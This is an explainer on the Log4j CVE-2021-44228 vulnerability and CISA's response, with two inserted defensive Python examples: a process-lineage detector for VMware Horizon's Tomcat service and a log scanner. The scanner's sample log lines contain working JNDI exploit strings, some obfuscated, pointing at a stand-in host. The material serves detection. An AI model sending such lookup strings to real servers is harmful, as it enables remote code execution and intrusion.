The Cybersecurity and Infrastructure Security Agency (CISA) and its partners are responding to the widespread exploitation of a critical remote code execution (RCE) vulnerability in Apache’s Log4j software library, which security analysts are tracking as CVE-2021-44228.
Log4j is used in a wide variety of products, including applications, services and websites for both consumers and enterprises, to log security and performance information. Once malicious actors complete the initial compromise of the system, they use PowerShell commands to download a second payload such as cryptomining malware or ransomware. In particular, some attacks have deployed a Cobalt Strike beacon. VMware's Horizon products appear to be one of the most attractive targets for actors exploiting this vulnerability.
Attacks
Analysts identified CVE-2021-44228 in early December 2021; it affects Log4j versions 2.0-beta9 to 2.14.1. State-sponsored threat actors and cybercriminals began to exploit this vulnerability shortly after its discovery. For example, VMware reported in VMSA 2021-0028 that its Horizon servers had been compromised. This document was initially released on December 10, 2021, but VMware is updating it regularly with new information.
VMware has already released patches for Log4j, but customers have been slow to apply them. As a result, actors seem to be showing a preference for unpatched servers. BlackBerry has also reported an increase in the number of Log4j attacks on the Tomcat service that VMware Horizon uses. BlackBerry adds that it can reliably detect compromised systems by monitoring child processes of ws_TomcatService.exe.
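The process-lineage check BlackBerry describes, as an added example that is not from the article or from BlackBerry's own tooling: it takes process-creation records (shape loosely modelled on Sysmon event 1, with pid, ppid and image path), walks each process's ancestry, and reports every descendant of ws_TomcatService.exe, marking those that are script interpreters. The records and file paths are constructed for the example; the interpreter list is an assumption.

```python
from typing import Dict, List

# Parent we care about, compared case-insensitively on the image basename.
WATCHED_PARENT = "ws_tomcatservice.exe"

# Assumed set of interpreters that should not normally be launched beneath the
# Tomcat service; the article names PowerShell as the follow-on stage.
INTERPRETERS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}

# Constructed process-creation records (not real telemetry; paths are made up).
EVENTS = [
    {"pid": 100, "ppid": 4,   "image": r"C:\Windows\System32\services.exe"},
    {"pid": 200, "ppid": 100, "image": r"C:\example\horizon\ws_TomcatService.exe"},
    {"pid": 300, "ppid": 200, "image": r"C:\Windows\System32\cmd.exe"},
    {"pid": 400, "ppid": 300, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"pid": 800, "ppid": 300, "image": r"C:\Windows\System32\conhost.exe"},
    {"pid": 500, "ppid": 100, "image": r"C:\Windows\explorer.exe"},
    {"pid": 600, "ppid": 500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def ancestry(by_pid: Dict[int, dict], pid: int) -> List[str]:
    """Image basenames from the process itself up to the root.
    The 'seen' set guards against pid reuse producing a cycle."""
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid]["image"]))
        pid = by_pid[pid]["ppid"]
    return chain


def suspicious_descendants(events: List[dict]) -> List[dict]:
    """Every process that has ws_TomcatService.exe anywhere above it.
    Direct children and grandchildren (e.g. cmd.exe -> powershell.exe)
    are both caught because the full ancestry is walked."""
    by_pid = {e["pid"]: e for e in events}
    hits = []
    for e in sorted(events, key=lambda e: e["pid"]):
        chain = ancestry(by_pid, e["pid"])
        if WATCHED_PARENT in chain[1:]:          # [1:] skips the process itself
            hits.append({
                "pid": e["pid"],
                "image": chain[0],
                "interpreter": chain[0] in INTERPRETERS,
                "chain": " <- ".join(chain),
            })
    return hits


if __name__ == "__main__":
    for h in suspicious_descendants(EVENTS):
        level = "HIGH" if h["interpreter"] else "info"
        print(f'[{level}] pid {h["pid"]}: {h["chain"]}')
```

The benign explorer.exe -> powershell.exe chain is not reported, which is the point of anchoring on the parent rather than on the interpreter name alone; conhost.exe under cmd.exe is reported at low severity so an analyst still sees the whole tree.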
Technical Details
CVE-2021-44228 is the result of the way in which the Java Naming and Directory Interface (JNDI) resolves variables. The versions of Log4j affected by this vulnerability use JNDI features, such as message lookup substitution, that lack protection against endpoints controlled by an adversary, including Lightweight Directory Access Protocol (LDAP) servers. Adversaries are able to exploit CVE-2021-44228 by submitting a request to a target system that is crafted to execute arbitrary code. This request allows the adversary to take control of the system and conduct malicious acts such as launching ransomware and stealing information.
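Because the lookup is performed on whatever text reaches a log call, the defender's first signal is the lookup string itself appearing in request logs. The scanner below is an added example, not code from the article or from Apache: it URL-decodes each line, collapses the nested lookups Log4j 2.x would resolve (lower, upper and the `${name:-default}` default-value form) from the inside out, and then reports the scheme and host of any `${jndi:...}` lookup so they can be blocked or hunted. The log lines are constructed and point at the reserved .invalid domain; the set of substitutions handled is an assumption and is not exhaustive.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines (not from the article, CISA or VMware).
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [10/Dec/2021:12:00:01 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:03 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}dap://example.invalid/a}"',
    '10.0.0.9 - - [10/Dec/2021:12:00:04 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://example.invalid/b}"',
    '10.0.0.7 - - [10/Dec/2021:12:00:05 +0000] "GET /?q=${date:yyyy} HTTP/1.1" 200 512 "-" "curl/7.0"',
    '10.0.0.9 - - [10/Dec/2021:12:00:06 +0000] "GET /?x=%24%7Bjndi%3Adns%3A%2F%2Fexample.invalid%2Fc%7D HTTP/1.1" 200 512 "-" "curl/7.0"',
]

# An innermost ${...}: its body contains no further $, { or }.
INNER_LOOKUP = re.compile(r'\$\{([^${}]*)\}')
# What we look for once nesting has been collapsed: scheme and host of the lookup.
JNDI_LOOKUP = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*//\s*([^/}\s:]+)', re.IGNORECASE)


def _resolve_inner(body: str):
    """Resolve one innermost lookup body for the substitutions commonly used
    to disguise the token: ${lower:X} -> x, ${upper:X} -> X, and
    ${name:-default} -> default. We assume 'name' is undefined on the target
    (the conservative choice), so the default is always taken; this also
    covers the empty-name form ${::-X}. Anything else is left in place."""
    head = body.lower()
    if head.startswith('lower:'):
        return body[len('lower:'):].lower()
    if head.startswith('upper:'):
        return body[len('upper:'):].upper()
    if ':-' in body:
        return body.split(':-', 1)[1]
    return None


def normalize(text: str, max_rounds: int = 16) -> str:
    """URL-decode, then collapse nested lookups from the inside out until a
    round changes nothing. The round limit bounds work on hostile input."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            resolved = _resolve_inner(m.group(1))
            if resolved is None:
                return m.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def find_probe(line: str):
    """(scheme, host) of a JNDI lookup in the line after normalisation, else None."""
    m = JNDI_LOOKUP.search(normalize(line))
    return (m.group(1).lower(), m.group(2)) if m else None


def scan(lines):
    """[(line_index, scheme, host)] for every line that carries a JNDI lookup."""
    hits = []
    for i, line in enumerate(lines):
        probe = find_probe(line)
        if probe:
            hits.append((i, probe[0], probe[1]))
    return hits


if __name__ == '__main__':
    for idx, scheme, host in scan(SAMPLE_LOG_LINES):
        print(f'line {idx}: jndi lookup via {scheme} to {host}')
```

Line 4 contains a harmless `${date:...}` lookup and is not reported; only the jndi prefix matters. The extracted host is the callback the vulnerable server would contact, which is the value worth adding to egress blocks and to the hunt across other log sources. Absence of a hit proves nothing, since the string can arrive through any logged field, not just the ones an access log captures.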
Remediation
The most important action organizations can take to remediate the threat posed by CVE-2021-44228 is to upgrade to Log4j versions 2.3.2, 2.12.4 and 2.17.1, for Java 6, 7 and 8 respectively. They should also monitor the Apache Log4j Security Vulnerabilities webpage, which Apache updates regularly with guidance on remediation measures for Log4j vulnerabilities. In addition, users should refer to their vendors for updates on their products and services.
Vendors
CISA is urging vendors to take additional action to minimize the risk of sophisticated actors exploiting CVE-2021-44228. These actions are particularly important given the severity of this vulnerability. Vendors should immediately identify, mitigate and update any of their products and services that use Log4j to the latest version. They should also inform their users of any products containing these vulnerabilities and strongly encourage them to apply the appropriate updates.
Affected Organizations
Organizations affected by CVE-2021-44228 should also review CISA's GitHub repository for vendor information, so they can apply updates as they become available. CISA has already added CVE-2021-44228 to its Known Exploited Vulnerabilities Catalog, as directed by Binding Operational Directive (BOD) 22-01. BOD 22-01 provides instructions for reducing the risk of exploited vulnerabilities.
CISA also issued Emergency Directive (ED) 22-02, which provides instructions on mitigating Apache Log4j vulnerabilities. It directs the executive branch of the federal government to address these vulnerabilities, especially CVE-2021-44228. ED 22-02 also requires agencies to implement additional measures to protect vulnerable products in cases where official patches aren't available yet. Agencies should prioritize mission-critical systems, followed by other IT assets. For example, agencies must patch their internet-facing systems immediately, since they're particularly vulnerable to exploits of CVE-2021-44228. ED 22-02 thus supersedes BOD 22-01, which provides more lenient deadlines for patching internet-facing systems.
Screwy flickr photo by Bradley N. Weber shared under a Creative Commons (BY) license